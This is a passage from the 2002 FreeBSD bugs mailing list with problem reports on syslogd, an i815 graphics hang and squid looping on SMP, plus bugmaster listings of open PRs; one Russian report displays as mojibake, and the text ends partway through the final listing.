(EEST) From: land@dnepr.net Reply-To: land@dnepr.net To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41115: Syslogd stops sending messages to remote host after temporary network fail Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41115 >Category: bin >Synopsis: Syslogd stops sending messages to remote host after temporary network fail >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 04:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: land@dnepr.net >Release: FreeBSD 4.6-RELEASE-p2 i386 >Organization: >Environment: System: FreeBSD 4.6-RELEASE-p2 FreeBSD 4.6-RELEASE-p2 #3: Sun Jul 14 12:18:03 EEST 2002 /usr/obj/usr/src/sys/XXX i386 >Description: If syslogd can't successfully send udp message to configured in syslog.conf host, it do not try to send messages to this host until restart. >How-To-Repeat: syslog.conf: *.* @somehost Disble communication with that host. E.g.: /sbin/ipfw add 10 deny udp from any to $somehost 514 >Fix: *** /usr/src/usr.sbin/syslogd/syslogd.c Sat Jun 29 12:46:06 2002 --- syslogd.c Mon Jul 29 14:01:04 2002 *************** *** 1050,1059 **** break; } if (lsent != l) { - int e = errno; - (void)close(f->f_file); - errno = e; - f->f_type = F_UNUSED; logerror("sendto"); } } --- 1050,1055 ---- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 5: 0:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1538637B400 for ; Mon, 29 Jul 2002 05:00:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id DE3AB43E3B for ; Mon, 29 Jul 2002 05:00:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TC03JU038440 for ; Mon, 29 Jul 2002 05:00:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TC031C038439; Mon, 29 Jul 2002 05:00:03 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C534037B400 for ; Mon, 29 Jul 2002 04:52:25 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 58ADE43E65 for ; Mon, 29 Jul 2002 04:52:25 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TBpfOT030865 for ; Mon, 29 Jul 2002 04:51:41 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6TBpfhW030864; Mon, 29 Jul 2002 04:51:41 -0700 (PDT) Message-Id: <200207291151.g6TBpfhW030864@www.freebsd.org> Date: Mon, 29 Jul 2002 04:51:41 -0700 (PDT) From: Roman To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41117: òÁÂÏÔÁ Ó ÇÒÁÆÉÞÅÓËÉÍ ÞÉÐÏÍ i815 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41117 >Category: misc >Synopsis: òÁÂÏÔÁ Ó ÇÒÁÆÉÞÅÓËÉÍ ÞÉÐÏÍ i815 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 05:00:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Roman >Release: 4.5 >Organization: Home >Environment: >Description: ðÒÉ ÚÁÐÕÓËÅ X Window ÐÙÔÁÅÔÓÑ ÐÅÒÅÊÔÉ × ÇÒÁÆÉÞÅÓËÉÊ ÒÅÖÉÍ É "×ÉÓÎÅÔ". ðÏÍÏÇÁÅÔ ótrl-Alt-Del. îÁÓÔÒÏÊËÉ ×ÉÄÅÏ: i810 (ÉÎÏÇÏ ÎÅ ÄÁÎÏ), 4 íâ ×ÉÄÅÏÐÁÍÑÔÉ, ÍÏÎÉÔÏÒ 1024x768(70 Hz) ÐÒÉ 16 ÂÉÔÁÈ. >How-To-Repeat: >Fix: ÷ÏÚÍÏÖÎÁ ÚÁÇÒÕÚËÁ ×ÉÄÅÏ ÔÏÌØËÏ ËÁË Generic VGA compatible ÐÒÉ 8 ÂÉÔÁÈ, ÐÒÉ ÒÁÚÒÅÛÅÎÉÉ 640x480. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 7: 4:53 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6BC6737B400 for ; Mon, 29 Jul 2002 07:04:52 -0700 (PDT) Received: from reiher.informatik.uni-wuerzburg.de (wi4d22.informatik.uni-wuerzburg.de [132.187.101.122]) by mx1.FreeBSD.org (Postfix) with ESMTP id B6EAF43E6A for ; Mon, 29 Jul 2002 07:04:51 -0700 (PDT) (envelope-from mkb@mukappabeta.de) Received: from mukappabeta.de (localhost [127.0.0.1]) by reiher.informatik.uni-wuerzburg.de (Postfix) with ESMTP id 869B2AE9C; Mon, 29 Jul 2002 16:04:49 +0200 (CEST) Message-ID: <3D454B81.2050405@mukappabeta.de> Date: Mon, 29 Jul 2002 16:04:49 +0200 From: Matthias Buelow User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020607 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Peter Pentchev Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail References: <200207290740.g6T7e31g091006@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peter Pentchev wrote: > I believe that it would not be feasible, if at all possible, for the > system periodic scripts to support the correct syntax for various > mailers' commands. An easy workaround would be for you to set Then maybe such configuration-specific issues should be kept out of the periodic scripts? I mean, if somebody wants more detailed info about the mailing system in periodic, he could always add periodic scripts, or use cron, or whatever. --mkb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 8:40:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C9B3837B400 for ; Mon, 29 Jul 2002 08:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2593843E67 for ; Mon, 29 Jul 2002 08:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TFe2JU083858 for ; Mon, 29 Jul 2002 08:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TFe2uk083857; Mon, 29 Jul 2002 08:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3312F37B400 for ; Mon, 29 Jul 2002 08:31:58 -0700 (PDT) Received: from morzine.ciger.be (morzine.ciger.be [193.74.104.226]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4430D43E42 for ; Mon, 29 Jul 2002 08:31:57 -0700 (PDT) (envelope-from root@morzine.ciger.be) Received: from morzine.ciger.be (localhost.ciger.be [127.0.0.1]) by morzine.ciger.be (8.12.5/8.12.5) with ESMTP id g6TFVt8g012597 for ; Mon, 29 Jul 2002 17:31:55 +0200 (CEST) Received: (from root@localhost) by morzine.ciger.be (8.12.5/8.12.5/Submit) id g6TFVsbl012596; Mon, 29 Jul 2002 17:31:54 +0200 (CEST) Message-Id: <200207291531.g6TFVsbl012596@morzine.ciger.be> Date: Mon, 29 Jul 2002 17:31:54 +0200 (CEST) From: Henri Hennebert Reply-To: Henri Hennebert To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41125: squid-2.4.STABLE7 loop on poll() - SMP kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41125 >Category: kern >Synopsis: squid-2.4.STABLE7 loop on poll() - SMP kernel >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 08:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Henri Hennebert >Release: FreeBSD 4.6-STABLE i386 >Organization: CIGER sa >Environment: System: FreeBSD morzine.ciger.be 4.6-STABLE FreeBSD 4.6-STABLE #0: Fri Jul 12 17:38:36 CEST 2002 root@morzine.ciger.be:/usr/obj/usr/src/sys/MORZINE i386 >Description: I'm running squid 2.4.STABLE7 (configured and compiled 'by hand' - not from ports) on a SMP configuration. All seems normal until squid start to loop and use 100% of a CPU. After a while, all return to normal and top shows squid in poll state. Then 100% again... I truss squid several times for 4-5 secs when in 100% CPU and get the following result: --- snip --- poll(0xbfbfc13c,0x4b,0x0) = 2 (0x2) read(0x43,0x961f000,0xfff) = 0 (0x0) read(0x71,0x96e1000,0xfff) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) poll(0xbfbfc13c,0x4b,0x0) = 2 (0x2) read(0x43,0x961f000,0xfff) = 0 (0x0) read(0x71,0x96e1000,0xfff) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) poll(0xbfbfc13c,0x4b,0x0) = 2 (0x2) read(0x43,0x961f000,0xfff) = 0 (0x0) read(0x71,0x96e1000,0xfff) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) poll(0xbfbfc13c,0x4b,0x0) = 2 (0x2) read(0x43,0x961f000,0xfff) = 0 (0x0) read(0x71,0x96e1000,0xfff) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) gettimeofday(0x8164efc,0x0) = 0 (0x0) SIGNAL 27 SIGNAL 27 gettimeofday(0x8164efc,0x0) = 0 (0x0) gettimeofday(0x281c282c,0x0) = 0 (0x0) sigprocmask(0x3,0x281c28b8,0x0) = 0 (0x0) sigaltstack(0x281de9e0,0x0) = 0 (0x0) sigreturn(0x81f6064) = 0 (0x0) poll(0xbfbfbf14,0x1,0x0) = 0 (0x0) poll(0xbfbfc13c,0x4b,0x0) = 2 (0x2) read(0x43,0x961f000,0xfff) = 0 (0x0) read(0x71,0x96e1000,0xfff) = 0 (0x0) --- snip --- During the same 100% period, the other truss sampling show poll call return 3, 4, 3, 2, ... Squid is using 3 cache dirs with async io (aufs). I try sync io (ufs) and disk daemon (diskd) to no avail. It seems that it's not related to the squid load (average 120 req/min). The 100% period is at least 4-5 minutes long. I never encounter this situation when running squid on a mono- processor config (at least since FreeBSD 3.2 and squid-2.2). Is it a problem with SMP / poll() ? >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 11: 0:10 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9921037B400 for ; Mon, 29 Jul 2002 11:00:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 388C043E4A for ; Mon, 29 Jul 2002 11:00:08 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TI08JU020413 for ; Mon, 29 Jul 2002 11:00:08 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TI06Cx020408 for freebsd-bugs@freebsd.org; Mon, 29 Jul 2002 11:00:06 -0700 (PDT) Date: Mon, 29 Jul 2002 11:00:06 -0700 (PDT) Message-Id: <200207291800.g6TI06Cx020408@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: open PR's (mis)filed to gnats-admin and in limbo Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2002/07/18] pending/40733gnats-adminRe: [Fix] security/gpgme pkg-plist info f o [2002/07/19] pending/40774gnats-admin o [2002/07/23] pending/40939gnats-adminkern/040893: www.vivirasturias.com/dmesg o [2002/07/26] pending/41009gnats-adminRe: fix port: x11/gxset o [2002/07/27] pending/41073gnats-adminRe: added .warning in make(1) + two fixes o [2002/07/28] pending/41080gnats-adminPR 40081 o [2002/07/29] pending/41127gnats-adminRE: Update port: lang/ghc - avoid problem 7 problems total. Non-critical problems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 11: 3:26 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 722C637B401 for ; Mon, 29 Jul 2002 11:00:29 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0D11343E3B for ; Mon, 29 Jul 2002 11:00:21 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TI0KJU020502 for ; Mon, 29 Jul 2002 11:00:20 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TI08C2020418 for freebsd-bugs@freebsd.org; Mon, 29 Jul 2002 11:00:08 -0700 (PDT) Date: Mon, 29 Jul 2002 11:00:08 -0700 (PDT) Message-Id: <200207291800.g6TI08C2020418@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The problem is understood and a solution is being sought. f - feedback Further work requires additional information from the originator or the community - possibly confirmation of the effectiveness of a proposed solution. p - patched A patch has been committed, but some issues (MFC and / or confirmation from originator) are still open. s - suspended The problem is not being worked on, due to lack of information or resources. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested -- or when fixing the problem is abandoned. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1998/05/13] kern/6630 phk [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/11/25] kern/8861 mdodd under heavy (multi interface) traffic ep0 s [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch f [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [2000/01/17] misc/16157 green "fire" screensave kills network performan o [2000/02/14] kern/16708 wpaul 3Com 3c900-Combo Ehternet card make kerne o [2000/02/18] i386/16802 An user math program have the system on K o [2000/03/15] i386/17391 jhb FreeBSD boot loader does not recognize ke o [2000/03/27] kern/17620 jhay Digi/570i sync driver (if_ar.c) causes sy f [2000/03/28] alpha/17642 alpha FreeBSD/alpha 4.0 RELEASE installation fa o [2000/05/09] misc/18466 dillon install via nfs or ftp media silently tru o [2000/05/17] misc/18641 paul FreeBSD V4.0 crashes when using ifconfig f [2000/05/29] kern/18874 peter 32bit NFS servers export wrong negative v o [2000/06/13] kern/19247 uthread_sigaction.c does not do anything o [2000/06/14] misc/19257 Detection of connected ports on a Cyclom o [2000/07/12] gnu/19882 obrien ld does not detect all undefined symbols! o [2000/07/30] i386/20308 yokota vidcontrol VESA_800x600 causes a kernel p f [2000/07/31] kern/20310 groudier Symbios 53c875j drivers don't work o [2000/08/05] kern/20429 yokota setting flags 0x1 in atkbd0 locks keyboar o [2000/08/08] i386/20495 yokota 4.1-STABLE and 4.1-RELEASE: keyboard does o [2000/08/28] kern/20895 groudier sym driver doesn't work for SYM53C895A o [2000/09/04] misc/21025 msmith BTX loader 1.00 gets 1Gb of memory from B f [2000/09/04] i386/21042 mdodd Keyboard driver problems with PS/2 Model o [2000/09/12] kern/21220 msmith mlx0: I/O error - attempt to write beyond o [2000/09/14] kern/21272 wpaul USB interrupts seem to be turned off o [2000/09/14] kern/21278 gibbs ahc driver wedges on stressed SMP system o [2000/11/01] kern/22494 wpaul Fatal trap 12: page fault while in kernel f [2000/11/02] kern/22557 fatal kernel trap 0x2(memory management) f [2000/11/03] bin/22595 brian telnetd tricked into using arbitrary peer o [2000/11/18] kern/22953 keu driver throws 'usb error on rx: IOERR o [2000/11/20] gnu/22972 obrien Internal Compiler Error o [2000/11/25] misc/23103 standards lacks many ISO C99 features (NAN f [2000/11/27] i386/23145 brian pppoe-test-program panics the server o [2000/11/29] kern/23173 read hangs in linux emulation f [2000/12/09] kern/23411 SMP Kernel Freezes Machines on Dual Proce a [2000/12/14] kern/23547 msmith only one logical device on Mylex AcceleRA f [2000/12/14] i386/23548 4.x causes Thinkpad 560X disk to spin up/ o [2001/01/17] kern/24418 read/write in thread library (-lc_r) does s [2001/01/30] kern/24740 cy filesystem corruption CFP1080 CAM SCSI ca f [2001/02/20] kern/25235 OS Hungs up when using with a Battery of f [2001/02/23] i386/25328 4.x stable kernel crash: page fault f [2001/02/27] misc/25407 Error while booting 4.2 : ahc0 Signaled A o [2001/03/09] kern/25632 n_hibma USB modem (umodem) may destroy the cfreel o [2001/03/20] kern/25950 obrien Bad drives on asr look zero-length and pa o [2001/03/24] kern/26048 obrien 4.3-RC: SMP and asr driver don't work to f [2001/03/30] kern/26223 Linux /compat/linux/dev devices doesn't w o [2001/04/13] kern/26549 IPsec policies for more than one pair of f [2001/04/20] i386/26736 System freeze booting from (i386) 4.3 flo f [2001/04/25] kern/26840 dillon process doing mmap() over nfs hangs in vm o [2001/05/02] ports/27036 sobomax All Ports using Mesa3 are required with - f [2001/05/02] i386/27042 4.3-RELEASE installation from CDROM fails f [2001/05/02] kern/27048 Bus support (I believe) broken in freeBSD f [2001/05/03] kern/27059 groudier (symbios) SCSI subsystem hangs under heav a [2001/05/10] kern/27250 bp unionfs filesystem panics in large number o [2001/05/11] kern/27275 kernel bug ? f [2001/05/17] conf/27408 rc.network hangs at rpc.umntall if stale o [2001/06/07] bin/27939 rlogin uses wrong IP address for remote h o [2001/06/08] kern/27985 Recent -STABLE crashes when accessing dc f [2001/06/09] kern/27987 sos New ATA Driver failure with VIA Southbrid o [2001/06/25] kern/28402 kernel panic caused by softupdates (may b o [2001/06/27] kern/28465 Enabling softupdates on a clean but activ o [2001/06/27] kern/28466 When soft updates is enabled, cpl is not o [2001/06/30] i386/28550 Boot: Fatal Trap 12: page fault while in f [2001/06/30] i386/28558 makedev return non-zero status after inst o [2001/07/02] kern/28630 Look like hung up a kernel after few minu f [2001/07/04] kern/28703 dillon Kernel reboot during tape backup of nfs m o [2001/07/05] kern/28751 n_hibma USB Mouse doesn't seem to work! o [2001/07/14] kern/28966 pirzyk math libraries in linux emulation do not o [2001/07/15] ports/28995 max deMime produces blank line in header part f [2001/07/17] i386/29045 Heavy disk usage causes panic in ffs_blkf o [2001/07/21] kern/29121 msdos fs causes kernel panic when writing o [2001/07/24] misc/29200 dcs Syntax errors in /boot/device.hints cause o [2001/08/14] conf/29699 Setting NO_MAILWRAPPER results in a syst o [2001/08/15] kern/29742 PCCARD Modems don't work on cardbus bridg o [2001/08/15] kern/29743 TI-1450 interrupt storm o [2001/08/18] kern/29844 setpgrp does not behave as manual says o [2001/08/18] kern/29847 n_hibma USB usbd_probe_and_attach() is broken and o [2001/09/03] kern/30300 -current hang caught and crash-dump'd. o [2001/09/04] ports/30331 portmgr Conflict between bsd.port.mk MAKEFILE var o [2001/09/09] i386/30458 Workstation sometimes hangs when connecte f [2001/09/12] i386/30527 does not like scsi on atrend 6260 dual PI o [2001/09/19] i386/30670 4.3 and 4.4 mfsroot floppies reboot Dell o [2001/09/20] i386/30693 On new install bootup does endless usb0: f [2001/09/21] i386/30705 msmith Installation fails on system with Mylex A o [2001/09/23] kern/30771 Panic when mounting drive a [2001/09/24] i386/30802 gibbs repeat of i386/22760. Adaptec SCSI contro o [2001/09/27] bin/30869 dump does not dump all files of a filesys o [2001/09/29] kern/30921 ACER mechanic ps/2 keyboard don´t work an o [2001/09/30] ports/30935 taoka pips sc880 - needs to have syvr4 support o [2001/10/01] i386/30961 On lsdev -> error & BTX halted =( o [2001/10/04] kern/31042 murray Device name conflict o [2001/10/12] kern/31233 Kernel panics after upgrading to 4.4-STAB o [2001/10/13] ports/31254 obrien I cannot compile Java src files using gcj o [2001/10/14] misc/31266 cjc System can be crashed with "ls -al /flopp o [2001/10/15] bin/31304 joe fix crunchgen to work with more contrib-k o [2001/10/17] conf/31327 Fixes and improvements for rc.diskless* s o [2001/10/24] kern/31468 Spontaneous crashes, possible related to o [2001/10/25] kern/31493 BTX halted with big disk and 4.4R f [2001/10/31] i386/31671 4.4 installer hangs at " Mounting root fr o [2001/11/02] kern/31710 kernel reboots; looks like an unintended o [2001/11/03] i386/31728 Install hangs on: (debug screens last wri o [2001/11/12] ports/31948 steve open-motif: having USE_MOTIF in /etc/make o [2001/11/16] bin/32040 brian 4.4-Release "set mtu" in ppp is broken wi f [2001/11/20] i386/32127 Proliant 1600 kernel panics after SMP is o [2001/11/22] kern/32184 Kernel crashes in ufs code o [2001/11/23] i386/32237 4.4-RELEASE keyboard doesnt work after bo f [2001/11/30] kern/32418 silby kernel table full o [2001/12/04] ports/32506 des Apache mod_auth_pam doesn't works o [2001/12/11] kern/32713 usb mouse detaches from hub and doesnt re o [2001/12/12] alpha/32757 alpha fatal kernel trap using generic kernel fo o [2001/12/14] i386/32830 FreeBSD 4.4 install fails on Thinkpad 750 a [2001/12/14] kern/32831 sos HP Colorado IDE tape drive get wedged eas o [2001/12/16] bin/32895 imp rebooting between Win98SE and 4.4-2001121 a [2001/12/22] i386/33089 murray GENERIC bloat causes 'make world' to brea o [2001/12/27] misc/33261 dwmalone FreeBSD base system does not install tcpd p [2001/12/27] gnu/33262 mp gdb does not handle pending signals corre f [2002/01/04] misc/33567 RELENG_4 won't makeworld; bsd.dep.mk, Mak o [2002/01/07] bin/33670 dwmalone default inetd install allows for unlimite f [2002/01/08] misc/33688 Downloading some files with ftp hangs the o [2002/01/14] ports/33887 kris security/snort port cannot find its rule o [2002/01/16] kern/33951 pthread_cancel is ignored o [2002/01/16] kern/33952 Bogus error message from correct phreads o [2002/01/16] kern/33970 random freeze on IDE Raid 0 (Highpoint HP o [2002/01/17] misc/33997 Reboot Fails on Server o [2002/01/17] i386/34018 response to request from ipv6 client does o [2002/01/18] bin/34028 brian userland ppp o [2002/01/19] kern/34067 n_hibma Reproducable crash on usb ugen o [2002/01/19] kern/34071 pcn-driver is sort-of-broken in 4.5RC2 (a a [2002/01/21] ports/34123 mharo sudo coredumps on ^C in password prompt & o [2002/01/21] i386/34144 installation,mounting root from ufs:/dev/ o [2002/01/25] bin/34274 green 4.5-RC Interoperability issue: sshd o [2002/01/27] ports/34357 portmgr ports needs a resume function. f [2002/01/30] kern/34447 DLink DFE 500 rev E1 + dhclient dc0 crash o [2002/01/30] kern/34470 bde Modem gets sio1 interrupt-level buffer o f [2002/02/03] i386/34576 cannot load freebsd o [2002/02/06] ports/34669 www "download" links in WWW ports listing are o [2002/02/06] kern/34680 Kernel panics when checking-out a tree (d o [2002/02/07] kern/34711 frequent system stall under moderate scsi o [2002/02/18] kern/35082 IBM Intellistation will not reboot with S o [2002/02/18] i386/35096 Network card dies copying files > 200MB w o [2002/02/20] misc/35150 FreeBSD 4.5 won't install ... out of inod o [2002/02/20] misc/35151 High NFSD load in FreeBSD 4.5R f [2002/02/26] kern/35354 4.4/4.5 FreeBSD causes hard lock after 20 o [2002/03/01] kern/35466 xe driver can not read CIS tuples o [2002/03/06] i386/35615 sound ES1978 Maestro 2E sound card locks up mac o [2002/03/09] docs/35723 doc le(4) page doesn't warn about likely syst o [2002/03/09] i386/35726 Won't let me use ifconfig on the interfac f [2002/03/14] i386/35902 Right after i configure the ip settings, o [2002/03/15] i386/35950 ACPI missing prevents install from floppi o [2002/03/19] kern/36095 cd9660_vfsops.c: cd9660_vget_internal() k o [2002/03/20] kern/36149 kernel panic with option PPP_DEFLATE for o [2002/03/23] kern/36228 hw.ata.tags=1 does not work o [2002/03/25] kern/36313 ATA disk not bootable anymore after cvsup o [2002/03/26] i386/36342 rl/dc(smc) + ppppoe = major bug ! o [2002/03/27] kern/36384 Rushen local broken up f [2002/03/27] bin/36400 netstat crashes when trying to display AF o [2002/03/27] ports/36404 security-officerAcrobat Reader seems to link against zlib o [2002/03/29] kern/36504 dillon crash/panic vm_object_allocate under file a [2002/03/30] kern/36532 sos ar_buf because it is too short, it makes o [2002/03/30] kern/36549 sym driver fails on Tekram DC-390U in 486 o [2002/04/07] i386/36850 Page Fault using ppp with USB Modem o [2002/04/10] ports/36964 portmgr cvsupit from www.freebsd.org is out of da o [2002/04/10] kern/36970 kernel cannot root device, ar0s1a on boot o [2002/04/12] kern/37015 Kernel panic in tty_subr.c while using pp o [2002/04/14] kern/37056 usb mouse with bios legacy support on han o [2002/04/14] kern/37060 sos kernel panic with hw.ata.tags=1 in ata-di o [2002/04/14] kern/37064 System hangs when removing wire of NIC D- o [2002/04/16] kern/37144 panic: biodone: Zero vnode ref count ... o [2002/04/18] i386/37225 boot loader problem f [2002/04/18] ports/37241 ports character ranges in regular expressions i o [2002/04/19] kern/37257 SMP 4.5 freezes o [2002/04/24] bin/37435 des xdm SIGABRTs after rev 1.3 of etc/pam.d/x o [2002/04/28] ports/37524 glewis java_vm left in memory after exiting mozi o [2002/04/29] kern/37581 Onboard AC97 - channel dead o [2002/04/30] kern/37606 ru genmask, rt_fixchange causes kernel panic o [2002/05/01] kern/37624 USB devices: 82801CA/CAM give error with o [2002/05/03] ports/37724 dirk (re)installing mod_php4 makes httpd dump o [2002/05/07] kern/37831 sound Half of buffer gets filled with silence w o [2002/05/10] kern/37929 silby hang of vr interface running at 100 MBit/ o [2002/05/12] i386/38016 i386_get_ldt range checking bug o [2002/05/12] i386/38021 i386_set_ldt can be cheated o [2002/05/13] kern/38029 Kernel panic in lockmgr o [2002/05/13] bin/38058 brian ppp alters IP header length field 40 -> 4 o [2002/05/14] kern/38070 4.6-PRERELEASE panics on resume on Fujits s [2002/05/15] kern/38107 Panic on nullfs a [2002/05/17] ports/38196 trevor domain name transition: sut.ac.jp -> tus. o [2002/05/18] i386/38223 fix vm86 bios call crash bug (updated) o [2002/05/20] alpha/38356 alpha 4.5-RELEASE src/sys tree on the alpha arc o [2002/05/23] conf/38456 pccard.conf is not valid for IO DATA CDP- o [2002/05/23] i386/38459 Intel SB82558B NIC won't initialize prope o [2002/05/23] i386/38484 probe freeze o [2002/05/24] conf/38518 combination of pr-27087 and pr-36911 